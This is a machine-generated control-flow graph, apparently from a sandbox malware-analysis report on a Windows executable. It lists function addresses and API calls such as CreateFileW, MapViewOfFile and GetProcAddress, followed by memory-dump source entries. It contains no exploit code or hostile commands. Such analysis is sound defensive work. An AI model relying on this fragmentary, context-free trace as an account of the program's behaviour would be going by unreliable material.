7486 412220 18 API calls 7484->7486 7487 7f82c1 7485->7487 7488 7f8281 7485->7488 7489 7f8210 7486->7489 7742 437410 7487->7742 7717 57a950 7488->7717 7655 7f5410 7489->7655 7496 57a950 33 API calls 7500 7f82fa 7496->7500 7497 4104b0 TlsGetValue 7498 7f82b2 7497->7498 7501 40fde0 TlsGetValue 7498->7501 7499 411d20 14 API calls 7499->7477 7502 4104b0 TlsGetValue 7500->7502 7503 7f82bf 7501->7503 7504 7f830d 7502->7504 7746 437260 7503->7746 7505 40fde0 TlsGetValue 7504->7505 7505->7503 7508 7f8359 7510 7f883d 7508->7510 7511 7f8396 7508->7511 7509 437260 TlsGetValue 7512 7f8350 7509->7512 7816 7f8a80 7510->7816 7513 511410 57 API calls 7511->7513 7750 579290 7512->7750 7516 7f83b0 7513->7516 7517 410430 TlsGetValue 7516->7517 7519 7f83cf 7517->7519 7518 40fec0 TlsGetValue 7520 7f885a 7518->7520 7521 7f8524 7519->7521 7522 7f83e2 7519->7522 7524 40fec0 TlsGetValue 7520->7524 7523 411d20 14 API calls 7521->7523 7525 411d20 14 API calls 7522->7525 7526 7f854a 7523->7526 7527 7f886c 7524->7527 7528 7f8408 7525->7528 7529 45e650 33 API calls 7526->7529 7530 411d20 14 API calls 7527->7530 7531 45e650 33 API calls 7528->7531 7532 7f8560 7529->7532 7533 7f887f 7530->7533 7534 7f841e 7531->7534 7536 412220 18 API calls 7532->7536 7537 411e20 14 API calls 7533->7537 7535 412220 18 API calls 7534->7535 7538 7f8451 7535->7538 7539 7f8593 7536->7539 7540 7f8899 7537->7540 7541 411d20 14 API calls 7538->7541 7542 510740 50 API calls 7539->7542 7543 411e20 14 API calls 7540->7543 7544 7f8475 7541->7544 7545 7f85ad 7542->7545 7546 7f88b3 7543->7546 7549 411d20 14 API calls 7544->7549 7553 7f851f 7544->7553 7547 411d20 14 API calls 7545->7547 7548 40fec0 TlsGetValue 7546->7548 7547->7553 7550 7f88c5 7548->7550 7551 7f84a8 7549->7551 7552 411d20 14 API calls 7550->7552 7554 45e650 33 API calls 7551->7554 7555 7f88d8 7552->7555 7556 40fde0 TlsGetValue 7553->7556 7557 7f84be 7554->7557 7555->6963 7558 7f862b 7556->7558 7559 412220 18 API calls 7557->7559 7770 436880 7558->7770 7561 7f84f1 7559->7561 7759 510740 7561->7759 7562 7f8639 7564 7f87ff 7562->7564 7779 7f4670 7562->7779 7567 411d20 14 API calls 7564->7567 7575 7f8817 7567->7575 7568 411d20 14 API calls 7568->7553 7570 7f86ba 7571 411d20 14 API calls 7570->7571 7573 7f86dd 7571->7573 7576 45e650 33 API calls 7573->7576 7575->7518 7578 7f86f0 7576->7578 7580 412220 18 API calls 7578->7580 7582 7f8720 7580->7582 7584 411d20 14 API calls 7582->7584 7586 7f8749 7584->7586 7585 579ce0 80 API calls 7585->7570 7586->7564 7587 411d20 14 API calls 7586->7587 7588 7f8776 7587->7588 7589 45e650 33 API calls 7588->7589 7590 7f8789 7589->7590 7591 412220 18 API calls 7590->7591 7592 7f87b9 7591->7592 7809 579f50 7592->7809 7597 411d20 14 API calls 7597->7564 7599 411b70 TlsGetValue 7598->7599 7600 7f9158 7599->7600 7601 411b70 TlsGetValue 7600->7601 7602 7f916b 7601->7602 7603 411b70 TlsGetValue 7602->7603 7604 7f917b 7603->7604 7605 7f91bb 7604->7605 7606 440a70 33 API calls 7604->7606 7607 7f91f7 7605->7607 7608 440a70 33 API calls 7605->7608 7606->7605 7609 413560 14 API calls 7607->7609 7608->7607 7610 7f9222 7609->7610 7611 411d20 14 API calls 7610->7611 7612 7f9288 7611->7612 7613 45e650 33 API calls 7612->7613 7614 7f929b 7613->7614 7615 412220 18 API calls 7614->7615 7616 7f92cb 7615->7616 7617 411d20 14 API calls 7616->7617 7618 7f9304 7617->7618 7619 440a70 33 API calls 7618->7619 7620 7f9343 7618->7620 7619->7620 7621 413390 18 API calls 7620->7621 7623 7f94cb 7621->7623 7622 7f9525 7625 411d20 14 API calls 7622->7625 7623->7622 7624 413390 18 API calls 7623->7624 7624->7622 7626 7f956c 7625->7626 7627 45e650 33 API calls 7626->7627 7628 7f957f 7627->7628 7629 412220 18 API calls 7628->7629 7630 7f95ac 7629->7630 7819 7fb0f0 7630->7819 7633 411d20 14 API calls 7634 7f9603 7633->7634 7635 7f9633 7634->7635 7636 40ced0 TlsGetValue 7634->7636 7637 411d20 14 API calls 7635->7637 7636->7635 7638 7f965d 7637->7638 7639 411e20 14 API calls 7638->7639 7640 7f8155 7639->7640 7640->7471 7644 7f7443 7641->7644 7650 7f74f9 7641->7650 7642 40fde0 TlsGetValue 7643 7f7519 7642->7643 7643->7477 7643->7479 7644->7650 7825 44b3d0 7644->7825 7646 7f74c7 7829 44b130 7646->7829 7648 7f74ec 7649 410430 TlsGetValue 7648->7649 7649->7650 7650->7642 7652 45e65d 7651->7652 7653 45e67b 7652->7653 7654 440a70 33 API calls 7652->7654 7653->7484 7654->7653 7656 7f543f 7655->7656 7657 7f545b 7656->7657 7658 7f544a 7656->7658 7659 44afb0 35 API calls 7657->7659 7867 44afb0 7658->7867 7661 7f5455 7659->7661 7662 44b130 50 API calls 7661->7662 7663 7f54a8 7662->7663 7664 410430 TlsGetValue 7663->7664 7665 7f54b5 7664->7665 7666 40fde0 TlsGetValue 7665->7666 7667 7f54bf 7666->7667 7668 40fde0 TlsGetValue 7667->7668 7669 7f54d3 7668->7669 7670 413560 14 API calls 7669->7670 7671 7f54e6 7670->7671 7671->7499 7673 442f1a 7672->7673 7674 442f42 7673->7674 7675 442f57 7673->7675 7676 410430 TlsGetValue 7674->7676 7677 443014 7675->7677 7678 442f68 7675->7678 7716 442f52 7676->7716 7679 4104b0 TlsGetValue 7677->7679 7871 434b10 7678->7871 7682 443024 7679->7682 7681 40fec0 TlsGetValue 7684 443761 7681->7684 7685 4104b0 TlsGetValue 7682->7685 7683 442f78 7876 434b60 7683->7876 7687 413560 14 API calls 7684->7687 7691 442fe9 7685->7691 7688 443774 7687->7688 7689 40fec0 TlsGetValue 7688->7689 7690 443786 7689->7690 7690->7483 7697 443059 7691->7697 7703 44313e 7691->7703 7692 442f99 7693 442fd6 7692->7693 7694 442feb 7692->7694 7696 4104b0 TlsGetValue 7693->7696 7695 434b10 TlsGetValue 7694->7695 7695->7691 7696->7691 7698 40fde0 TlsGetValue 7697->7698 7711 443062 7698->7711 7699 4431cb 7700 4431d4 7699->7700 7701 443741 7699->7701 7704 4431f5 7700->7704 7705 44332d 7700->7705 7702 410430 TlsGetValue 7701->7702 7702->7716 7703->7699 7708 413390 18 API calls 7703->7708 7706 4113d0 TlsGetValue 7704->7706 7707 4113d0 TlsGetValue 7705->7707 7706->7716 7707->7716 7708->7703 7709 4114b0 TlsGetValue 7709->7711 7711->7709 7712 4430be 7711->7712 7711->7716 7882 411190 7711->7882 7713 448740 TlsGetValue 7712->7713 7714 4430dd 7713->7714 7715 4114b0 TlsGetValue 7714->7715 7715->7716 7716->7681 7718 57a98c 7717->7718 7719 57a97a 7717->7719 7721 57a995 7718->7721 7727 57a9a7 7718->7727 7720 410430 TlsGetValue 7719->7720 7723 57a987 7720->7723 7724 410430 TlsGetValue 7721->7724 7722 57aa00 7888 57b7e0 7722->7888 7728 40fde0 TlsGetValue 7723->7728 7724->7723 7726 57aa11 7729 57aa22 7726->7729 7735 57aa31 7726->7735 7727->7722 7731 440a70 33 API calls 7727->7731 7733 57a9d4 7727->7733 7730 57aaa5 7728->7730 7732 410430 TlsGetValue 7729->7732 7730->7497 7731->7733 7732->7723 7733->7722 7734 440a70 33 API calls 7733->7734 7734->7722 7736 57aa57 7735->7736 7737 57aa8a 7735->7737 7739 411190 TlsGetValue 7736->7739 7738 411580 TlsGetValue 7737->7738 7738->7723 7740 57aa68 7739->7740 7741 4116b0 TlsGetValue 7740->7741 7741->7723 7743 43742e 7742->7743 7895 448700 7743->7895 7747 43727f 7746->7747 7748 448740 TlsGetValue 7747->7748 7749 4372cd 7748->7749 7749->7508 7749->7509 7899 57ae50 SetLastError 7750->7899 7757 40fde0 TlsGetValue 7758 5792ce 7757->7758 7758->7508 7760 51076f 7759->7760 7761 413390 18 API calls 7760->7761 7763 5107d3 7761->7763 7762 51082d 7764 413560 14 API calls 7762->7764 7763->7762 8005 50f240 7763->8005 8008 510620 7763->8008 7765 51083e 7764->7765 7766 413560 14 API calls 7765->7766 7768 51084f 7766->7768 7768->7568 7771 411140 7770->7771 7772 436899 GetFileAttributesW 7771->7772 7773 43692d GetLastError 7772->7773 7774 4368ad 7772->7774 7778 4368bc 7773->7778 7775 4368d2 CreateFileW 7774->7775 7774->7778 7776 436915 GetLastError 7775->7776 7777 436909 CloseHandle 7775->7777 7776->7778 7777->7778 7778->7562 7780 7f46ad 7779->7780 7782 7f46e5 7780->7782 8023 43c060 7780->8023 7782->7570 7783 579f60 7782->7783 8034 57a260 7783->8034 7786 579ce0 7787 579d34 7786->7787 7790 579d3f 7786->7790 7788 4090f0 TlsGetValue 7787->7788 7788->7790 7789 579dd2 SetLastError 8094 436cd0 7789->8094 7791 4090f0 TlsGetValue 7790->7791 7794 579d77 7790->7794 7791->7794 7792 4090f0 TlsGetValue 7795 579daf 7792->7795 7794->7789 7794->7792 7795->7789 7796 579de7 7797 579e11 CreateFileW 7796->7797 7798 579e8f CloseHandle SetLastError 7797->7798 7799 579e4c SetFileTime 7797->7799 7800 409120 TlsGetValue 7798->7800 7799->7798 7801 579ea9 7800->7801 7802 409120 TlsGetValue 7801->7802 7803 579eb2 7802->7803 7804 409120 TlsGetValue 7803->7804 7805 579ebb 7804->7805 7806 579f70 7805->7806 7807 57a260 47 API calls 7806->7807 7808 579f7b 7807->7808 7808->7585 7810 57a260 47 API calls 7809->7810 7811 579f5b 7810->7811 7812 57a040 7811->7812 7813 57a058 7812->7813 8301 436de0 7813->8301 7817 411d20 14 API calls 7816->7817 7818 7f8aa4 7817->7818 7818->7575 7820 7fb10b 7819->7820 7821 440a70 33 API calls 7820->7821 7823 7fb132 7820->7823 7821->7823 7822 412220 18 API calls 7824 7f95c1 7822->7824 7823->7822 7824->7633 7826 44b3de 7825->7826 7828 44b3ec 7825->7828 7845 44bb90 7826->7845 7828->7646 7830 44b155 7829->7830 7831 44b17c 7830->7831 7832 440a70 33 API calls 7830->7832 7833 440c20 50 API calls 7831->7833 7835 44b1b0 7831->7835 7832->7831 7833->7835 7834 44b1ef 7837 44b247 7834->7837 7838 440c20 50 API calls 7834->7838 7835->7834 7836 440c20 50 API calls 7835->7836 7836->7834 7857 44a6d0 7837->7857 7838->7837 7840 44b265 7841 44b28b 7840->7841 7843 440a70 33 API calls 7840->7843 7842 4113d0 TlsGetValue 7841->7842 7844 44b29e 7842->7844 7843->7841 7844->7648 7847 44bbaa 7845->7847 7849 44b5e0 7847->7849 7848 44bbde 7848->7828 7853 44b608 7849->7853 7850 44b624 GetACP 7852 44b63f GetCPInfo 7850->7852 7851 44b632 7851->7852 7854 44b66d 7852->7854 7855 44b682 7852->7855 7853->7850 7853->7851 7856 440a70 33 API calls 7854->7856 7855->7848 7856->7855 7858 44a6de 7857->7858 7865 44a6f8 7857->7865 7861 440a70 33 API calls 7858->7861 7858->7865 7859 44a72e 7862 440c20 50 API calls 7859->7862 7863 44a764 7859->7863 7860 440c20 50 API calls 7860->7859 7861->7865 7862->7863 7864 44a7b3 7863->7864 7866 440c20 50 API calls 7863->7866 7864->7840 7865->7859 7865->7860 7866->7864 7868 44afc0 7867->7868 7869 44afda 7867->7869 7868->7869 7870 44bb90 35 API calls 7868->7870 7869->7661 7870->7869 7872 410430 TlsGetValue 7871->7872 7873 434b21 7872->7873 7874 434b2f 7873->7874 7885 4106f0 7873->7885 7874->7683 7877 434b73 7876->7877 7878 4100a0 TlsGetValue 7877->7878 7879 434b8c 7878->7879 7880 434ba2 7879->7880 7881 434b98 CharLowerBuffW 7879->7881 7880->7692 7881->7880 7883 4100a0 TlsGetValue 7882->7883 7884 4111aa 7883->7884 7884->7711 7886 410610 TlsGetValue 7885->7886 7887 4106f9 7886->7887 7887->7874 7891 57b0d0 7888->7891 7890 57b7eb 7890->7726 7892 57b0e8 7891->7892 7894 57b10f 7891->7894 7893 440a70 33 API calls 7892->7893 7892->7894 7893->7894 7894->7890 7896 44871c 7895->7896 7897 4117a0 TlsGetValue 7896->7897 7898 437442 7897->7898 7898->7496 7900 4374d0 2 API calls 7899->7900 7901 57ae7d GetLastError 7900->7901 7902 57ae86 7901->7902 7903 57aeab 7901->7903 7902->7903 7905 43ea00 3 API calls 7902->7905 7904 40fde0 TlsGetValue 7903->7904 7906 5792b2 7904->7906 7907 57ae99 7905->7907 7909 579160 7906->7909 7938 440800 7907->7938 7942 579bc0 7909->7942 7911 579180 7917 5791bc 7911->7917 7961 57aef0 7911->7961 7913 40fde0 TlsGetValue 7914 5791ce 7913->7914 7918 436a90 7914->7918 7915 57919a 7916 440a70 33 API calls 7915->7916 7915->7917 7916->7917 7917->7913 7919 436abd 7918->7919 7920 436adf 7919->7920 7921 440a70 33 API calls 7919->7921 8000 442b60 7920->8000 7921->7920 7924 4104b0 TlsGetValue 7925 436b08 7924->7925 7926 436960 4 API calls 7925->7926 7928 436b13 7926->7928 7927 40fec0 TlsGetValue 7929 436b9f 7927->7929 7931 437200 TlsGetValue 7928->7931 7932 436b2a 7928->7932 7937 436b51 7928->7937 7930 40fde0 TlsGetValue 7929->7930 7933 436ba8 7930->7933 7931->7932 7934 437200 TlsGetValue 7932->7934 7932->7937 7933->7757 7935 436b6c 7934->7935 7936 436a90 37 API calls 7935->7936 7936->7937 7937->7927 7939 44081e 7938->7939 7940 410430 TlsGetValue 7939->7940 7941 440842 7940->7941 7941->7903 7976 57a3e0 7942->7976 7944 579be7 7980 57b460 7944->7980 7947 579c09 7987 434ce0 7947->7987 7948 440a70 33 API calls 7948->7947 7951 440a70 33 API calls 7952 579c3a 7951->7952 7953 440a70 33 API calls 7952->7953 7956 579c66 7952->7956 7953->7956 7954 579c9b 7955 40fde0 TlsGetValue 7954->7955 7958 579cad 7955->7958 7956->7954 7997 579a10 7956->7997 7958->7911 7960 440a70 33 API calls 7960->7954 7962 411190 TlsGetValue 7961->7962 7963 57af35 7962->7963 7964 411190 TlsGetValue 7963->7964 7965 57af46 7964->7965 7966 411580 TlsGetValue 7965->7966 7967 57af57 7966->7967 7968 4117a0 TlsGetValue 7967->7968 7969 57b068 7968->7969 7970 57b08a 7969->7970 7971 411190 TlsGetValue 7969->7971 7972 40fec0 TlsGetValue 7970->7972 7974 57b07d 7971->7974 7973 57b09a 7972->7973 7973->7915 7975 4114b0 TlsGetValue 7974->7975 7975->7970 7977 57a3ee 7976->7977 7978 440a70 33 API calls 7977->7978 7979 57a414 7977->7979 7978->7979 7979->7944 7981 434ce0 TlsGetValue 7980->7981 7984 57b490 7981->7984 7982 40fec0 TlsGetValue 7983 579bf0 7982->7983 7983->7947 7983->7948 7985 411190 TlsGetValue 7984->7985 7986 57b4c3 7984->7986 7985->7986 7986->7982 7988 434cf9 7987->7988 7992 434d38 7988->7992 7994 434d29 7988->7994 7989 434d55 7990 40fde0 TlsGetValue 7989->7990 7993 434d36 7990->7993 7991 434d5f 7995 448740 TlsGetValue 7991->7995 7992->7989 7992->7991 7993->7951 7993->7952 7996 410430 TlsGetValue 7994->7996 7995->7993 7996->7993 7998 436960 4 API calls 7997->7998 7999 579a19 7998->7999 7999->7954 7999->7960 8001 410430 TlsGetValue 8000->8001 8002 442b70 8001->8002 8003 436afb 8002->8003 8004 4113d0 TlsGetValue 8002->8004 8003->7924 8004->8003 8011 50f260 8005->8011 8017 510640 8008->8017 8012 50f289 8011->8012 8014 440a70 33 API calls 8012->8014 8015 50f2a9 8012->8015 8013 50f251 8013->7763 8014->8015 8015->8013 8016 440a70 33 API calls 8015->8016 8016->8015 8018 510669 8017->8018 8020 440a70 33 API calls 8018->8020 8021 510689 8018->8021 8019 510631 8019->7763 8020->8021 8021->8019 8022 440a70 33 API calls 8021->8022 8022->8021 8024 43c0c1 8023->8024 8025 43c070 8023->8025 8024->7782 8025->8024 8027 43bf60 8025->8027 8030 43bed0 8027->8030 8031 43bee3 8030->8031 8032 434200 50 API calls 8031->8032 8033 43bf19 8031->8033 8032->8033 8033->8024 8035 57a3e0 33 API calls 8034->8035 8036 57a297 8035->8036 8037 57b460 TlsGetValue 8036->8037 8038 57a2a0 8037->8038 8039 57a2b9 8038->8039 8040 440a70 33 API calls 8038->8040 8041 434ce0 TlsGetValue 8039->8041 8040->8039 8042 57a2ce 8041->8042 8043 440a70 33 API calls 8042->8043 8044 57a2ea 8042->8044 8043->8044 8045 57a316 8044->8045 8046 440a70 33 API calls 8044->8046 8047 57ae50 6 API calls 8045->8047 8046->8045 8048 57a32b 8047->8048 8061 57aad0 8048->8061 8051 436960 4 API calls 8052 57a346 8051->8052 8053 57a35f 8052->8053 8054 440a70 33 API calls 8052->8054 8055 57a394 8053->8055 8091 57a070 8053->8091 8054->8053 8057 40fec0 TlsGetValue 8055->8057 8059 579f6b 8057->8059 8059->7786 8060 440a70 33 API calls 8060->8055 8062 57ab26 8061->8062 8063 40fde0 TlsGetValue 8062->8063 8064 57ab33 8063->8064 8065 434ce0 TlsGetValue 8064->8065 8066 57ab43 8065->8066 8067 4104b0 TlsGetValue 8066->8067 8068 57ab53 8067->8068 8069 411190 TlsGetValue 8068->8069 8070 57ab64 8069->8070 8071 411190 TlsGetValue 8070->8071 8072 57ab75 8071->8072 8073 411580 TlsGetValue 8072->8073 8074 57ab86 8073->8074 8075 411190 TlsGetValue 8074->8075 8083 57abe6 8074->8083 8075->8083 8076 4117a0 TlsGetValue 8077 57ad8e 8076->8077 8078 410430 TlsGetValue 8077->8078 8079 57ad9e 8078->8079 8080 40fde0 TlsGetValue 8079->8080 8081 57ada8 8080->8081 8082 40fec0 TlsGetValue 8081->8082 8084 57adb8 8082->8084 8083->8076 8085 40fde0 TlsGetValue 8084->8085 8086 57adc1 8085->8086 8087 40fde0 TlsGetValue 8086->8087 8088 57adca 8087->8088 8089 40fde0 TlsGetValue 8088->8089 8090 57a338 8089->8090 8090->8051 8092 436880 5 API calls 8091->8092 8093 57a079 8092->8093 8093->8055 8093->8060 8095 411140 8094->8095 8096 436d01 GetFileAttributesW 8095->8096 8097 436d21 8096->8097 8098 436d84 8096->8098 8112 434060 8097->8112 8099 40fec0 TlsGetValue 8098->8099 8101 436d94 8099->8101 8102 40fde0 TlsGetValue 8101->8102 8103 436d9d 8102->8103 8103->7796 8104 436d34 8104->8098 8105 436d70 8104->8105 8106 437200 TlsGetValue 8104->8106 8107 436d79 GetFileAttributesW 8105->8107 8108 436d52 8106->8108 8107->8098 8125 442b00 8108->8125 8111 411580 TlsGetValue 8111->8105 8113 43408b 8112->8113 8114 434175 8113->8114 8115 436880 5 API calls 8113->8115 8114->8104 8116 4340a1 8115->8116 8116->8114 8130 436470 8116->8130 8118 4340b5 8118->8114 8119 4340ca GetFileAttributesW 8118->8119 8119->8114 8120 4340df 8119->8120 8120->8114 8121 434115 CreateFileW 8120->8121 8121->8114 8122 434150 8121->8122 8161 433d50 8122->8161 8126 410430 TlsGetValue 8125->8126 8127 442b10 8126->8127 8128 436d5f 8127->8128 8129 4114b0 TlsGetValue 8127->8129 8128->8111 8129->8128 8131 413390 18 API calls 8130->8131 8132 4364ca 8131->8132 8133 413390 18 API calls 8132->8133 8134 4364e8 8133->8134 8135 436960 4 API calls 8134->8135 8136 4364fe 8135->8136 8137 43650d 8136->8137 8138 436880 5 API calls 8136->8138 8141 436624 8137->8141 8195 4372f0 8137->8195 8138->8137 8143 417be0 33 API calls 8141->8143 8142 442b00 TlsGetValue 8144 436532 8142->8144 8145 436634 8143->8145 8147 43653e GetVolumeInformationW 8144->8147 8146 440800 TlsGetValue 8145->8146 8152 4365e3 8146->8152 8148 43661f 8147->8148 8151 436589 GetDriveTypeW 8147->8151 8205 443d70 GetLastError 8148->8205 8151->8152 8153 40fec0 TlsGetValue 8152->8153 8154 43665e 8153->8154 8155 413560 14 API calls 8154->8155 8156 43666e 8155->8156 8157 413560 14 API calls 8156->8157 8158 43667e 8157->8158 8159 40fde0 TlsGetValue 8158->8159 8160 43668a 8159->8160 8160->8118 8162 40fde0 TlsGetValue 8161->8162 8167 433dbf 8162->8167 8163 433e67 8164 433e7d CreateFileMappingW 8163->8164 8165 433f6a 8163->8165 8164->8165 8166 433ebe MapViewOfFile 8164->8166 8168 433e5b 8165->8168 8233 433c00 8165->8233 8169 433ef1 GetCurrentProcess 8166->8169 8170 433f5d CloseHandle 8166->8170 8167->8163 8181 433e27 8167->8181 8173 40fec0 TlsGetValue 8168->8173 8230 4234a0 8169->8230 8170->8165 8176 433fe0 CloseHandle 8173->8176 8175 433f11 8178 433f50 UnmapViewOfFile 8175->8178 8180 411240 TlsGetValue 8175->8180 8176->8114 8177 410430 TlsGetValue 8179 433f96 8177->8179 8178->8170 8179->8168 8184 433aa0 TlsGetValue 8179->8184 8182 433f29 8180->8182 8183 411240 TlsGetValue 8181->8183 8185 433aa0 TlsGetValue 8182->8185 8186 433e3b 8183->8186 8188 433fb9 8184->8188 8189 433f39 8185->8189 8218 433aa0 8186->8218 8192 410430 TlsGetValue 8188->8192 8190 410430 TlsGetValue 8189->8190 8193 433f49 8190->8193 8192->8168 8193->8178 8194 410430 TlsGetValue 8194->8168 8196 437309 8195->8196 8197 437324 8196->8197 8202 437344 8196->8202 8200 4117a0 TlsGetValue 8197->8200 8198 4373f1 8199 40fde0 TlsGetValue 8198->8199 8201 436522 8199->8201 8200->8201 8201->8142 8202->8198 8203 437383 8202->8203 8204 4117a0 TlsGetValue 8203->8204 8204->8201 8208 443d90 8205->8208 8209 443e03 8208->8209 8210 443daf 8208->8210 8212 440a70 33 API calls 8209->8212 8211 43ea00 TlsGetValue FormatMessageW LocalFree 8210->8211 8213 443dc8 8211->8213 8214 443e01 8212->8214 8215 440c20 50 API calls 8213->8215 8216 40fde0 TlsGetValue 8214->8216 8215->8214 8217 443d82 8216->8217 8217->8141 8223 433ae1 8218->8223 8219 433b94 8220 40fec0 TlsGetValue 8219->8220 8221 433bc4 8220->8221 8221->8194 8222 411240 TlsGetValue 8222->8223 8223->8219 8223->8222 8224 433b41 8223->8224 8225 4111e0 TlsGetValue 8224->8225 8226 433b69 8225->8226 8227 4117a0 TlsGetValue 8226->8227 8228 433b83 8227->8228 8229 411580 TlsGetValue 8228->8229 8229->8219 8244 422f10 8230->8244 8232 4234ba 8232->8175 8234 40fde0 TlsGetValue 8233->8234 8236 433c24 8234->8236 8235 433ce7 8235->8177 8238 433c49 8236->8238 8292 4208c0 8236->8292 8238->8235 8239 4090f0 TlsGetValue 8238->8239 8241 433c98 8239->8241 8240 433cdd 8243 409120 TlsGetValue 8240->8243 8241->8240 8242 4111e0 TlsGetValue 8241->8242 8242->8240 8243->8235 8245 422f3f 8244->8245 8246 422f22 8244->8246 8245->8232 8246->8245 8247 4208c0 TlsGetValue GetProcAddress 8246->8247 8248 422f59 8247->8248 8249 4208c0 TlsGetValue GetProcAddress 8248->8249 8250 422f73 8249->8250 8251 4208c0 TlsGetValue GetProcAddress 8250->8251 8252 422f8d 8251->8252 8253 4208c0 TlsGetValue GetProcAddress 8252->8253 8254 422fa7 8253->8254 8255 4208c0 TlsGetValue GetProcAddress 8254->8255 8256 422fc1 8255->8256 8257 4208c0 TlsGetValue GetProcAddress 8256->8257 8258 422fdb 8257->8258 8259 4208c0 TlsGetValue GetProcAddress 8258->8259 8260 422ff5 8259->8260 8261 4208c0 TlsGetValue GetProcAddress 8260->8261 8262 42300f 8261->8262 8263 4208c0 TlsGetValue GetProcAddress 8262->8263 8264 423029 8263->8264 8265 4208c0 TlsGetValue GetProcAddress 8264->8265 8266 423043 8265->8266 8267 4208c0 TlsGetValue GetProcAddress 8266->8267 8268 42305d 8267->8268 8269 4208c0 TlsGetValue GetProcAddress 8268->8269 8270 423077 8269->8270 8271 4208c0 TlsGetValue GetProcAddress 8270->8271 8272 423091 8271->8272 8273 4208c0 TlsGetValue GetProcAddress 8272->8273 8274 4230ab 8273->8274 8275 4208c0 TlsGetValue GetProcAddress 8274->8275 8276 4230c5 8275->8276 8277 4208c0 TlsGetValue GetProcAddress 8276->8277 8278 4230df 8277->8278 8279 4208c0 TlsGetValue GetProcAddress 8278->8279 8280 4230f9 8279->8280 8281 4208c0 TlsGetValue GetProcAddress 8280->8281 8282 423113 8281->8282 8283 4208c0 TlsGetValue GetProcAddress 8282->8283 8284 42312d 8283->8284 8285 4208c0 TlsGetValue GetProcAddress 8284->8285 8286 423147 8285->8286 8287 4208c0 TlsGetValue GetProcAddress 8286->8287 8288 423161 8287->8288 8289 4208c0 TlsGetValue GetProcAddress 8288->8289 8290 42317b 8289->8290 8291 4208c0 TlsGetValue GetProcAddress 8290->8291 8291->8245 8293 4208ea GetProcAddress 8292->8293 8294 4208fd 8292->8294 8295 420931 8293->8295 8296 4109e0 TlsGetValue 8294->8296 8297 40fe30 TlsGetValue 8295->8297 8299 42090e 8296->8299 8298 42093b 8297->8298 8298->8238 8300 40fe30 TlsGetValue 8299->8300 8300->8295 8302 4104b0 TlsGetValue 8301->8302 8303 436e26 8302->8303 8304 436e9e 8303->8304 8305 436e38 GetFileAttributesW 8303->8305 8306 436ea7 SetFileAttributesW 8304->8306 8305->8304 8307 436e48 8305->8307 8308 436eb6 GetLastError 8306->8308 8309 436ebe 8306->8309 8310 434060 73 API calls 8307->8310 8308->8309 8311 40fec0 TlsGetValue 8309->8311 8313 436e55 8310->8313 8312 436ece 8311->8312 8312->7597 8313->8304 8314 436e91 8313->8314 8315 437200 TlsGetValue 8313->8315 8316 4104b0 TlsGetValue 8314->8316 8317 436e73 8315->8317 8316->8304 8318 442b00 TlsGetValue 8317->8318 8319 436e80 8318->8319 8320 411580 TlsGetValue 8319->8320 8320->8314 8322 7f4953 8321->8322 8323 7f496c 8322->8323 8324 440a70 33 API calls 8322->8324 8323->6985 8324->8323 8326 7f48f4 8325->8326 8327 440a70 33 API calls 8326->8327 8328 7f490d 8326->8328 8327->8328 8328->6988 8330 7f484d 8329->8330 8331 7f4883 8330->8331 8332 440a70 33 API calls 8330->8332 8333 413560 14 API calls 8331->8333 8332->8331 8334 7f48a0 8333->8334 8334->6971 8336 40ff78 Sleep 8335->8336 8336->7016 8337 417be0 8338 417c0d 8337->8338 8345 417c47 8337->8345 8339 417c17 8338->8339 8340 417c49 8338->8340 8341 413d70 33 API calls 8339->8341 8342 4111e0 TlsGetValue 8340->8342 8343 417c22 8341->8343 8342->8345 8344 4100a0 TlsGetValue 8343->8344 8344->8345

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
